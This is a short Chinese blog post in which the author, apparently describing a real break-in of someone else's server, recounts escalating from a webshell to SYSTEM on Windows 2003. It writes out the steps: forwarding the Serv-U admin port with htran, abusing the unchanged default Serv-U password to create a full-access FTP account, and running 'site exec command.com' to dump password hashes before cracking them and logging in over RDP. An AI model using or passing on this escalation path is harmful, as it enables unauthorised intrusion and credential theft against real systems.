好久沒練手了。

By hack520 on

    很久沒有從webshell to system 玩了。。剛抓了個肉豬,比較艱難啊..獲取webshell就不說了,很簡單的。關鍵提權非常非常艱難啊~目標 win2003,SU 6.3,本地密碼沒改,但是不是這麼簡單的,人家把cmd.exe net.exe net1.exe cacls.exe icacls.exe ftp.exe,5次shift 用的exe, 還有各種.cpl 全部設置了權限~很杯具吧~SU 服務沒有被降權處理過,所以,它肯定是system權限運行的~肯定有搞的~先用htran 把43958 轉出來~htran -p -tran 1234 127.0.0.1 43958 ,然後用su管理連接~然後加1條ftp號,設置成最高權限,目錄指向C盤~連接上去,確認下我猜測的情況~

1.jpg

~——– 意思就是system 對此程序無任何權限..

沒關係~

quote site exec command.com /c c:\windows\temp\hash $local >c:\111.txt

成功,等到hash,破豬,登陸3389,完畢。command 很少做安全的豬會注意到。

作者:hack520

文章链接:好久沒練手了。

短连接:https://zhu.vn/?p=153

4 comments

发表评论